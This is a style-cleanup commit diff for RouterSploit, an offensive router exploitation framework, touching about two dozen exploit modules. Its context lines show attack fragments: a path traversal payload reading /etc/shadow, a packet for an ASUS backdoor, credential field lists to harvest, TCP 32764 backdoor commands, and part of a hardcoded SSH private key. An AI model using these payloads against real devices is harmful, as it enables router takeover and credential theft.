Fixing PEP8 violations.

routersploit/modules/exploits/3com/3cradsl72_info_disclosure.py

@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': '3Com 3CRADSL72 Info Disclosure',
-        'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability that allows to fetch credentials for SQL sa account',
+        'description': 'Exploits 3Com 3CRADSL72 information disclosure vulnerability '
+                       'that allows to fetch credentials for SQL sa account',
         'authors': [
             'Karb0nOxyde <karb0noxyde[at]gmail.com>',  # vulnerability discovery
             'Ivan Casado Ruiz <casadoi[at]yahoo.co.uk>',  # vulnerability discovery

routersploit/modules/exploits/3com/imc_path_traversal.py

@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': '3Com IMC Path Traversal',
-        'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. If the target is vulnerable it is possible to read file from the filesystem.',
+        'description': 'Exploits 3Com Intelligent Management Center path traversal vulnerability. '
+                       'If the target is vulnerable it is possible to read file from the filesystem.',
         'authors': [
             'Richard Brain',  # vulnerability discovery
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
@@ -34,7 +35,6 @@ class Exploit(exploits.Exploit):
     port = exploits.Option(8080, 'Target port')  # default port
     filename = exploits.Option('\\windows\\win.ini', 'File to read from the filesystem')
 
-
     def run(self):
         if self.check():
             print_success("Target seems to be vulnerable")

routersploit/modules/exploits/3com/officeconnect_info_disclosure.py

@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': '3Com OfficeConnect Info Disclosure',
-        'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. If the target is vulnerable it is possible to read sensitive information.',
+        'description': 'Exploits 3Com OfficeConnect information disclosure vulnerability. '
+                       'If the target is vulnerable it is possible to read sensitive information.',
         'authors': [
             'Luca Carettoni <luca.carettoni[at]ikkisoft.com>',  # vulnerablity discovery
             'iDefense',  # vulnerability discovery

routersploit/modules/exploits/asus/infosvr_backdoor_rce.py

@@ -70,7 +70,7 @@ class Exploit(exploits.Exploit):
         sock.bind(('0.0.0.0', 9999))
         sock.settimeout(2)
 
-        packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
+        packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
 
         try:
             sock.sendto(packet, (self.target, 9999))
@@ -86,7 +86,7 @@ class Exploit(exploits.Exploit):
             if len(data) == 512 and data[1] == "\x16":
                 break
         length = struct.unpack('<H', data[14:16])[0]
-        output = data[16:16+length]
+        output = data[16:16 + length]
         sock.close()
         return output
 

routersploit/modules/exploits/belkin/g_plus_info_disclosure.py

@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'Belkin G Info Disclosure',
-        'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability which allows fetching sensitive information such as credentials.',
+        'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure '
+                       'vulnerability which allows fetching sensitive information such as credentials.',
         'authors': [
             'DarkFig',  # vulnerability discovery
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
@@ -42,7 +43,8 @@ class Exploit(exploits.Exploit):
         if response is None:
             return
 
-        var = ['pppoe_username',
+        var = [
+            'pppoe_username',
             'pppoe_password',
             'wl0_pskkey',
             'wl0_key1',
@@ -50,7 +52,8 @@ class Exploit(exploits.Exploit):
             'mradius_secret',
             'httpd_password',
             'http_passwd',
-                'pppoe_passwd']
+            'pppoe_passwd'
+        ]
 
         data = []
         for v in var:
@@ -76,7 +79,8 @@ class Exploit(exploits.Exploit):
         if response is None:
             return False  # target is not vulnerable
 
-        var = ['pppoe_username',
+        var = [
+            'pppoe_username',
             'pppoe_password',
             'wl0_pskkey',
             'wl0_key1',
@@ -84,7 +88,8 @@ class Exploit(exploits.Exploit):
             'mradius_secret',
             'httpd_password',
             'http_passwd',
-                'pppoe_passwd']
+            'pppoe_passwd'
+        ]
 
         if any(map(lambda x: x in response.text, var)):
             return True   # target vulnerable

routersploit/modules/exploits/cisco/dpc2420_info_disclosure.py

@@ -58,4 +58,3 @@ class Exploit(exploits.Exploit):
             return True  # target is vulnerable
 
         return False  # target is not vulnerable
-

routersploit/modules/exploits/cisco/ucm_info_disclosure.py

@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'Cisco UCM Info Disclosure',
-        'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. If the target is vulnerable it is possible to read sensitive information through TFTP service.',
+        'description': 'Module exploits information disclosure vulnerability in Cisco UCM devices. '
+                       'If the target is vulnerable it is possible to read sensitive information through TFTP service.',
         'authors': [
             'Daniel Svartman <danielsvartman[at]gmail.com',  # vulnerability discovery
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
@@ -72,4 +73,3 @@ class Exploit(exploits.Exploit):
             return True  # target is vulnerable
 
         return False  # target is not vulnerable
-       

routersploit/modules/exploits/cisco/ucs_manager_rce.py

@@ -19,7 +19,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'Cisco UCS Manager RCE',
-        'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which allows executing commands on operating system level.',
+        'description': 'Module exploits Cisco UCS Manager 2.1 (1b) Remote Code Execution vulnerability which '
+                       'allows executing commands on operating system level.',
         'authors': [
             'thatchriseckert',  # vulnerability discovery
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
@@ -84,4 +85,3 @@ class Exploit(exploits.Exploit):
             return True
 
         return False
-

routersploit/modules/exploits/comtrend/ct_5361t_password_disclosure.py

@@ -10,7 +10,7 @@ from routersploit import (
     http_request,
     mute,
     validators,
- )
+)
 
 
 class Exploit(exploits.Exploit):

routersploit/modules/exploits/dlink/dir_300_320_600_615_info_disclosure.py

@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure',
-        'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
+        'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600,'
+                       'DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
         'authors': [
             'tytusromekiatomek <tytusromekiatomek[at]inbox.com>',  # vulnerability discovery
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module

routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py

@@ -15,7 +15,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
-        'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
+        'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615'
+                       'revD devices. It is possible to access administration panel without providing password.',
         'authors': [
             'Craig Heffner',  # vulnerability discovery
             'Karol Celin',  # vulnerability discovery

routersploit/modules/exploits/dlink/dsl_2730b_2780b_526b_dns_change.py

@@ -38,7 +38,6 @@ class Exploit(exploits.Exploit):
     dns1 = exploits.Option('8.8.8.8', 'Primary DNS Server')
     dns2 = exploits.Option('8.8.4.4', 'Seconary DNS Server')
 
-
     def run(self):
         url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.target,
                                                                                                              self.port,

routersploit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py

@@ -66,7 +66,18 @@ class Exploit(exploits.Exploit):
     def check(self):
         # address and parameters
         url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
-        data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
+        data = {
+            "getpage": "html/index.html",
+            "*errorpage*": "../../../../../../../../../../../etc/shadow",
+            "var%3Amenu": "setup",
+            "var%3Apage": "connected",
+            "var%": "",
+            "objaction": "auth",
+            "%3Ausername": "blah",
+            "%3Apassword": "blah",
+            "%3Aaction": "login",
+            "%3Asessionid": "abcdefgh"
+        }
 
         # connection
         response = http_request(method="POST", url=url, data=data)
@@ -77,4 +88,3 @@ class Exploit(exploits.Exploit):
             return True  # target vulnerable
 
         return False  # target not vulnerable
-

routersploit/modules/exploits/huawei/hg520_info_dislosure.py

@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'Huawei HG520 Information Disclosure',
-        'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity. If the target is vulnerable it is possible to retrieve sensitive information.',
+        'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity.'
+                       'If the target is vulnerable it is possible to retrieve sensitive information.',
         'authors': [
             'hkm',  # vulnerablity discovery
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module

routersploit/modules/exploits/ipfire/ipfire_shellshock.py

@@ -18,7 +18,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'IPFire Shellshock',
-        'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82. If the target is vulnerable it is possible to execute commands on operating system level.',
+        'description': 'Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82.'
+                       'If the target is vulnerable it is possible to execute commands on operating system level.',
         'authors': [
             'Claudio Viviani',  # vulnerability discovery
             'Marcin Bury <marcin.bury@reverse-shell.com>',  # routersploit module

routersploit/modules/exploits/linksys/wap54gv3_rce.py

@@ -19,7 +19,9 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'Linksys WAP54Gv3',
-        'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices. Debug interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
+        'description': 'Module exploits remote command execution in Linksys WAP54Gv3 devices.'
+                       'Debug interface allows executing root privileged shell commands is available'
+                       'on dedicated web pages on the device.',
         'authors': [
             'Phil Purviance',  # vulnerability discovery
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module

routersploit/modules/exploits/multi/heartbleed.py

@@ -66,9 +66,9 @@ class Exploit(exploits.Exploit):
 
     def hexdump(self, s):
         for b in xrange(0, len(s), 16):
-            lin = [c for c in s[b : b + 16]]
+            lin = [c for c in s[b: b + 16]]
             hxdat = ' '.join('%02X' % ord(c) for c in lin)
-            pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
+            pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin)
             print '  %04x: %-48s %s' % (b, hxdat, pdat)
         print
 
@@ -139,7 +139,7 @@ class Exploit(exploits.Exploit):
 
         while True:
             typ, ver, pay = self.recvmsg(s)
-            if typ == None:
+            if typ is None:
                 print_error("Server closed connection without sending Server Hello.")
                 print_error("Exploit failed")
                 return
@@ -163,7 +163,7 @@ class Exploit(exploits.Exploit):
 
         while True:
             typ, ver, pay = self.recvmsg(s)
-            if typ == None:
+            if typ is None:
                 return False   # target is not vulnerable
 
             if typ == 22 and ord(pay[0]) == 0x0E:

routersploit/modules/exploits/multi/misfortune_cookie.py

@@ -67,7 +67,7 @@ class Exploit(exploits.Exploit):
             {'name': "TP-Link   TD-8840T        V2_100525", 'number': 107369790, 'offset': 17},  # 0x803ae0b1                                   # tested
             {'name': "TP-Link   TD-8840T        V2_100702_TR", 'number': 107369790, 'offset': 17},  # 0x803ae0b1                                # ----------
             {'name': "TP-Link   TD-8840T        V2_090609", 'number': 107369570, 'offset': 1},  # 0x803c65d5                                    # ----------
-            {'name': "TP-Link   TD-8840T        V3_101208", 'number':  107369766, 'offset': 17}, #0x803c3e89                                    # tested
+            {'name': "TP-Link   TD-8840T        V3_101208", 'number': 107369766, 'offset': 17},  # 0x803c3e89                                    # tested
             {'name': "TP-Link   TD-8840T        V3_110221", 'number': 107369764, 'offset': 5},  # 0x803d1a09                                    # ----------
             {'name': "TP-Link   TD-8840T        V3_120531", 'number': 107369688, 'offset': 17},  # 0x803fed35                                   # ----------
             {'name': "TP-Link   TD-W8101G       V1_090107", 'number': 107367772, 'offset': 37},  # 0x803bf701                                   # ----------

routersploit/modules/exploits/multi/ssh_auth_keys.py

@@ -147,7 +147,7 @@ class Exploit(exploits.Exploit):
             """
         },
         {  # loadbalancer.org enterprise va
-            "user":"root",
+            "user": "root",
             "private_key": """
             -----BEGIN DSA PRIVATE KEY-----
             MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW

routersploit/modules/exploits/multi/tcp_32764_info_disclosure.py

@@ -85,7 +85,7 @@ class Exploit(exploits.Exploit):
             print_error("Target is not vulnerable")
 
     def execute(self, s, message, payload=""):
-        header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
+        header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
         s.send(header + payload + "\x00")
         r = s.recv(0xC)
 

routersploit/modules/exploits/multi/tcp_32764_rce.py

@@ -79,7 +79,7 @@ class Exploit(exploits.Exploit):
             print self.execute(s, 7, cmd.strip("\n"))
 
     def execute(self, s, message, payload=""):
-        header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
+        header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
         s.send(header + payload + "\x00")
         r = s.recv(0xC)
 

routersploit/modules/exploits/netgear/prosafe_rce.py

@@ -19,7 +19,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'Netgear ProSafe RCE',
-        'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
+        'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe'
+                       'WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
         'authors': [
             'Andrei Costin <andrei[at]firmware.re>',  # vulnerability discovery
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module

routersploit/modules/exploits/tplink/wdr740nd_wdr740n_path_traversal.py

@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'TP-Link WDR740ND & WDR740N Path Traversal',
-        'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability that allows to read files from the filesystem.',
+        'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability'
+                       'that allowsto read files from the filesystem.',
         'authors': [
             'websec.ca',  # vulnerability discovery
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module

routersploit/modules/exploits/zte/f609_config_disclosure.py

@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'ZTE F609 Config Disclosure',
-        'description': 'Module exploits ZTE F609 Config Disclosure. If the target is possible to authentiate to the device.',
+        'description': 'Module exploits ZTE F609 Config Disclosure.'
+                       'If the target is possible to authentiate to the device.',
         'authors': [
             'devilscream',  # routersploit module
         ],

routersploit/modules/exploits/zte/f660_config_disclosure.py

@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'ZTE F660 Config Disclosure',
-        'description': 'Module exploits ZTE F660 Config Disclosure. If the target is possible to authentiate to the device.',
+        'description': 'Module exploits ZTE F660 Config Disclosure.'
+                       'If the target is possible to authentiate to the device.',
         'authors': [
             'devilscream',  # vulnerability discovery & routersploit module
         ],